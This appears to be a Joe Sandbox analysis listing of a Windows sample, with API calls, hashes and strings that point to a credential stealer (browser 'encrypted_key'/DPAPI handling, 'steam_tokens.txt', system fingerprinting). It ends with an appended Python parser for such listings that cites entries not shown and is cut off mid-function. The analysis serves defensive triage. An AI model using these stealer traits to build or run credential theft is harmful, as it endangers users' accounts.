                                  • Instruction ID: 8472422ce38f830ea1959f1949b32a6c7cdf079b303e30a7b3745462f6698eb2
                                  • Opcode Fuzzy Hash: eb5ad1d52b523f7eaf50c1f5c0037436949713905723790eb9c67b990eb6ddf3
                                  • Instruction Fuzzy Hash: A001B571601324ABE7265B64ACCDFEA77BCEB58751F000180F915D1290EFB08D989A60
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00318435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031846C
                                  • lstrlen.KERNEL32(00000000), ref: 003184B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003184E9
                                  • lstrlen.KERNEL32(00000000), ref: 003184FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031852E
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 0031853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 8505da4df5013c77a024efdfa3401db857606e93bdeb4bd9770a5dd37e3e4abb
                                  • Instruction ID: 68e433ac1c0e2511b422e51d2d0be837a7b65e8a9e3298d7da9d647ae4c1ac0f
                                  • Opcode Fuzzy Hash: 8505da4df5013c77a024efdfa3401db857606e93bdeb4bd9770a5dd37e3e4abb
                                  • Instruction Fuzzy Hash: E151B0719002029FCB2ADF68D888A9BB7F9EF59300F258459EC46DB345EF30E985CB54
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,003228A9), ref: 0032294B
                                  • RegQueryValueExA.ADVAPI32(003228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00322965
                                  • RegCloseKey.ADVAPI32(003228A9), ref: 0032296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: cfb52e80682e6691907a938a95687fd48ef7c11a8ebe21fce1b4c2c053320440
                                  • Instruction ID: 337fb0414b8bc65c4bb86db471510bf3a92bc47991dd30bb65bc1d1f08bbb0b7
                                  • Opcode Fuzzy Hash: cfb52e80682e6691907a938a95687fd48ef7c11a8ebe21fce1b4c2c053320440
                                  • Instruction Fuzzy Hash: FD01BCB5600329BBD318CBA0AC99EFB7BBCEB48711F100098FE4597340EA715A4887A0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032289C
                                    • Part of subcall function 00322910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00322925
                                    • Part of subcall function 00322910: RtlAllocateHeap.NTDLL(00000000), ref: 0032292C
                                    • Part of subcall function 00322910: RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,003228A9), ref: 0032294B
                                    • Part of subcall function 00322910: RegQueryValueExA.ADVAPI32(003228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00322965
                                    • Part of subcall function 00322910: RegCloseKey.ADVAPI32(003228A9), ref: 0032296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101B9D8,00000000,00020119,00319500), ref: 003228D1
                                  • RegQueryValueExA.ADVAPI32(00319500,0102DE50,00000000,00000000,00000000,000000FF), ref: 003228EC
                                  • RegCloseKey.ADVAPI32(00319500), ref: 003228F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 8dbcba3c654c89a9b41200f54327980e4fef8bc0a20ded420be8a39a6fe07fa5
                                  • Instruction ID: 0683bfed352affabce3e166f58c4ce5c5d899e238fbd229f5db319c1d36be755
                                  • Opcode Fuzzy Hash: 8dbcba3c654c89a9b41200f54327980e4fef8bc0a20ded420be8a39a6fe07fa5
                                  • Instruction Fuzzy Hash: 1401A2B5600318BBD7189BA4AC8DEBB777CEB54711F000154FE08D6350DAB09A4897A0
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0030723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00307279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00307280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003072C3
                                  • HeapFree.KERNEL32(00000000), ref: 003072CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00307329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 60e3ff3d669a50351f026594605de7ac70799ab0195ae8de164efc146c44472e
                                  • Instruction ID: ea4017df414bffcf04ea21f2360163f50755d298232fdff569c35e5eea5ee343
                                  • Opcode Fuzzy Hash: 60e3ff3d669a50351f026594605de7ac70799ab0195ae8de164efc146c44472e
                                  • Instruction Fuzzy Hash: F2414C75B067069BEB21CF69DC94BAAB3E8FB84305F1445A9EC49C7380E671F910DB90
                                  APIs
                                  • memset.MSVCRT ref: 0031D7D6
                                  • RegOpenKeyExA.ADVAPI32(80000001,0102D1C8,00000000,00020119,?), ref: 0031D7F5
                                  • RegQueryValueExA.ADVAPI32(?,0102DF70,00000000,00000000,00000000,000000FF), ref: 0031D819
                                  • RegCloseKey.ADVAPI32(?), ref: 0031D823
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031D848
                                  • lstrcat.KERNEL32(?,0102DFE8), ref: 0031D85C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 9ec44c372f5e8c006bed8788be3de89a521cc3e2b3e10af3ac6eec29cf40df35
                                  • Instruction ID: 40c70ca41cb28677b5543889f45e6fa91b5a3b0f4e592f383190c937d3406641
                                  • Opcode Fuzzy Hash: 9ec44c372f5e8c006bed8788be3de89a521cc3e2b3e10af3ac6eec29cf40df35
                                  • Instruction Fuzzy Hash: B341457561020CAFCB59EF68EC96BDE7775AB54304F004064B5099B391EF30AA99CF91
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00309CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00309CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00309D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: b37a3544bed2f59778fa344e40790802ebc53a75cb27e585bc622c70071c0bc0
                                  • Instruction ID: 52938a4d6816822d819c48446e061a6e92efa925fa6ccae6639c36bf0fc56f15
                                  • Opcode Fuzzy Hash: b37a3544bed2f59778fa344e40790802ebc53a75cb27e585bc622c70071c0bc0
                                  • Instruction Fuzzy Hash: AD418271E0220A9BDB22EF68DCA57EF77B4AF54304F0545A5E915AB2A3DE30ED04C790
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031EA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031EA61
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031EA7A
                                  • lstrcat.KERNEL32(?,01028880), ref: 0031EA8D
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031EA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: bcb831062ffbbc831469a63f5c20f05fb3a81b4cce8677c2365cb15d5db6d17a
                                  • Instruction ID: 1b09453b2d59518c6f9b7436516dc30ecf111260afaf48982c11f62bf6cc60f5
                                  • Opcode Fuzzy Hash: bcb831062ffbbc831469a63f5c20f05fb3a81b4cce8677c2365cb15d5db6d17a
                                  • Instruction Fuzzy Hash: 44419A71A11119ABCB16EF64DC55EEE7378FF58300F004454FA169B390DE709E989B90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031ECDF
                                  • lstrlen.KERNEL32(00000000), ref: 0031ECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ED1D
                                  • lstrlen.KERNEL32(00000000), ref: 0031ED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0031ED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: b631cb0344badf597b285c74d1c4b71f2af2a2c27c3800e26fbe0275f4f89164
                                  • Instruction ID: 8a6b5371e369cabe599932a6eec82278129423a089893159002e511f57f320e3
                                  • Opcode Fuzzy Hash: b631cb0344badf597b285c74d1c4b71f2af2a2c27c3800e26fbe0275f4f89164
                                  • Instruction Fuzzy Hash: 7D318931A125155BC723BB78EC5EAAF7BA8AF14700F051020F846DF292DF25DD6A8BC1
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0030140E), ref: 00309A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0030140E), ref: 00309AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,0030140E), ref: 00309AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,0030140E,00000000,?,?,?,0030140E), ref: 00309AE0
                                  • LocalFree.KERNEL32(?,?,?,?,0030140E), ref: 00309B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0030140E), ref: 00309B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 52a280cabcad714fbde1ba34bcaf0aa2b6b594579dd4a6e50b9237e10a59f6e7
                                  • Instruction ID: d8323091c9e065cdb0221b49191e6b62e311f0adb272e22d9dac42c17b73959d
                                  • Opcode Fuzzy Hash: 52a280cabcad714fbde1ba34bcaf0aa2b6b594579dd4a6e50b9237e10a59f6e7
                                  • Instruction Fuzzy Hash: C8115BB1605209AFEB12DFA9DCD8BBA736CEB54350F11025AF901A72C1EB709D14CBA0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325B14
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00325B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00325B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00325B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 37ee37b113a4cb21e7d739276a1a031021e705e70bf9cc8f046a8d3e7f896301
                                  • Instruction ID: b401c78f75349a26eaf1f10fbf92d314d278a87cd666f17851ec0d90be17d6fa
                                  • Opcode Fuzzy Hash: 37ee37b113a4cb21e7d739276a1a031021e705e70bf9cc8f046a8d3e7f896301
                                  • Instruction Fuzzy Hash: 63417271B005299FCF09DF6CD891AAEB7B5EB88310F158229E905E7344E630DD01CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 8681fe411ba2026c3059633b6842d4d522f5d9845aecf0428f709eea355abe15
                                  • Instruction ID: a7df82cf619257ae858c691499ed81fda70196523899f57fb3ee20de02f4ddeb
                                  • Opcode Fuzzy Hash: 8681fe411ba2026c3059633b6842d4d522f5d9845aecf0428f709eea355abe15
                                  • Instruction Fuzzy Hash: 52412A7050076CAEDB338B25DC85FFB7BFC9F45304F1448E9E98686182E271AA448F60
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D58
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1D5
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 7379f1416ff4876b369f21e679aca98d1635e03015ac8cd61c69a062721fde76
                                  • Instruction ID: 95d1497ec3567d58cd5bce38017ada4f7f6937f195f8b4d850ca0df8d555e5b6
                                  • Opcode Fuzzy Hash: 7379f1416ff4876b369f21e679aca98d1635e03015ac8cd61c69a062721fde76
                                  • Instruction Fuzzy Hash: 4921E9313146044BD72ADE2CE881A7AF7F5AF95750F254A6EE4418B241D770DC808761
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003233EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003233F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00323411
                                  • wsprintfA.USER32 ref: 00323437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: 28a6f28b6c13a08518b30c4dd12199d56552df636e8bd114ceef6c4216ae97c2
                                  • Instruction ID: 5c249e57055f7f2a3f6cd03ce4a9c0d5a02ddeda6b14d7a77ade811118fcd64b
                                  • Opcode Fuzzy Hash: 28a6f28b6c13a08518b30c4dd12199d56552df636e8bd114ceef6c4216ae97c2
                                  • Instruction Fuzzy Hash: AD01D8B1A04614AFDB05DF98DD49BAEB7BCFB44710F000229FA06E7380D7B4590086A5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptdfree
                                  • String ID: Xu3$Xu3
                                  • API String ID: 2640026729-2422181198
                                  • Opcode ID: e78314404a3d4ef5914ac26b41e991cf2c386cf131a5bea013b3175270d9808a
                                  • Instruction ID: 5a8a2a20e0ed31b7818b87c0e5795ccd0df854689cfab24d14bc4066a1dde012
                                  • Opcode Fuzzy Hash: e78314404a3d4ef5914ac26b41e991cf2c386cf131a5bea013b3175270d9808a
                                  • Instruction Fuzzy Hash: BD018432D06B39F7D623EB69B44679EB3547F01B10F160516E4046B680CB246D41DBD5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenmemset
                                  • String ID:
                                  • API String ID: 3212139465-0
                                  • Opcode ID: 9fefb147073165d1f4494d33f05aa0a4e414f6327adb8dfa39e2d0929b6640bf
                                  • Instruction ID: 7c17f97025e356e119224c3f6eecaaebdc305fcc39eb9cb53ee447176a126f66
                                  • Opcode Fuzzy Hash: 9fefb147073165d1f4494d33f05aa0a4e414f6327adb8dfa39e2d0929b6640bf
                                  • Instruction Fuzzy Hash: 238102B1E00215ABDB15DF95EC44BAFB7B5BF94300F248069E908AB381EB759D46CF90
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00317F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00317F60
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00317FA5
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00317FD3
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00318007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 0ef9c179c82b71a167ca0fb082d74e0cf1fef794bfcc1fc0e67527614a488404
                                  • Instruction ID: 4488b194ef23efb872a13da267eea1eb7876afbe842652a1b5606e75cd169fd3
                                  • Opcode Fuzzy Hash: 0ef9c179c82b71a167ca0fb082d74e0cf1fef794bfcc1fc0e67527614a488404
                                  • Instruction Fuzzy Hash: C141B07060410ADFCB26DF68C884EEE77B8FF58300F154189F8059B351EB70AAA6CB91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003180BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003180EA
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00318102
                                  • lstrlen.KERNEL32(00000000), ref: 00318140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 38c87c0a4c6ed42ed8108f6529e4a5f9c9a7776d382d2954ef22905dd7299740
                                  • Instruction ID: fc449ca5db00ce95b3d0c9ff3da86bb3525026dd3857fc4821298f5f4b293bd3
                                  • Opcode Fuzzy Hash: 38c87c0a4c6ed42ed8108f6529e4a5f9c9a7776d382d2954ef22905dd7299740
                                  • Instruction Fuzzy Hash: 2C417372600106ABCB26DF7CD984BEABBF4EF48700F11816CA845D7244EF34D986CB94
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00323166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,?), ref: 0032318C
                                  • RegQueryValueExA.ADVAPI32(?,0102D348,00000000,00000000,00000000,000000FF), ref: 003231A7
                                  • RegCloseKey.ADVAPI32(?), ref: 003231B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                   • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 2c29be027f415c1197306e9a4b91608c37b57d0d1a76fe20adf696b2b6d10baa
                                  • Instruction ID: 6c4465e6ef39bcd8a2644aff032c165f0d5ad39c193d1461cd3214f3b035d18a
                                  • Opcode Fuzzy Hash: 2c29be027f415c1197306e9a4b91608c37b57d0d1a76fe20adf696b2b6d10baa
                                  • Instruction Fuzzy Hash: E41130B6A44219AFD714DB94EC49BBBB7BCE744711F004119FA0593780DB75590487A1
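The APIs entries in this listing follow one shape: name.MODULE(stack slots), ref: call-site address, with ? for a slot the IDA plugin could not resolve. The entry just above is worth decoding: RegOpenKeyExA is called with root 80000002 (HKEY_LOCAL_MACHINE) and samDesired 00020119, which is KEY_READ | KEY_WOW64_64KEY, so this 32-bit sample asks for the native 64-bit view of an HKLM key rather than the WOW64-redirected one, and the SHGetFolderPathA entry later in this listing passes 0000001A, which is CSIDL_APPDATA. The Python below is an added example for this report, not Joe Sandbox code: it parses entries in that format and decodes those constants from standard Windows SDK values. The sample text is copied from this listing; reading the extra slots shown for GetProcessHeap as belonging to a neighbouring frame is an inference, not something the report states.

```python
"""Parse the 'APIs' entries of a Joe Sandbox function listing and decode the
constants a triager cares about. Added example for this report, not Joe
Sandbox code; the hex-to-name tables are standard Windows SDK values."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from entries in this listing (the HKLM
# registry read at 0032318C and the SHGetFolderPathA path build at 0031E544).
SAMPLE = """\
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00323166
• RtlAllocateHeap.NTDLL(00000000), ref: 0032316D
• RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,?), ref: 0032318C
• RegQueryValueExA.ADVAPI32(?,0102D348,00000000,00000000,00000000,000000FF), ref: 003231A7
• RegCloseKey.ADVAPI32(?), ref: 003231B1
• std::_Xinvalid_argument.LIBCPMT ref: 00308996
  • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1D5
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E544
• lstrcat.KERNEL32(?,0102D108), ref: 0031E59C
"""

# One entry: [Part of subcall function XXXXXXXX:] name.MODULE[(slot,slot,?)] ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                     # int, None for an unresolved '?' slot, or a resolved string
    ref: int                       # call-site address
    parent: Optional[int] = None   # set for "Part of subcall function" lines


def _slot(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok                 # e.g. the resolved string ERROR in lstrcpy(...,ERROR)


def parse_api_lines(text: str) -> list:
    """ApiCall records for every matching line; headings and other lines are skipped.
    Listed values are raw stack slots at the call site: GetProcessHeap takes no
    parameters, so its two slots belong to a neighbouring frame (plausibly
    RtlAllocateHeap's flags and size 0x104; an inference, not a report fact)."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [_slot(t) for t in m["args"].split(",")] if m["args"] else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), parent))
    return calls


HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
              0x80000005: "HKEY_CURRENT_CONFIG"}
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
KEY_BITS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
            (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
            (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x10000, "DELETE"),
            (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"),
            (0x100000, "SYNCHRONIZE")]
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x07: "CSIDL_STARTUP",
         0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x23: "CSIDL_COMMON_APPDATA", 0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM",
         0x26: "CSIDL_PROGRAM_FILES", 0x28: "CSIDL_PROFILE"}
CSIDL_FLAG_MASK, CSIDL_FLAG_CREATE = 0xFF00, 0x8000


def decode_key_access(mask: int) -> list:
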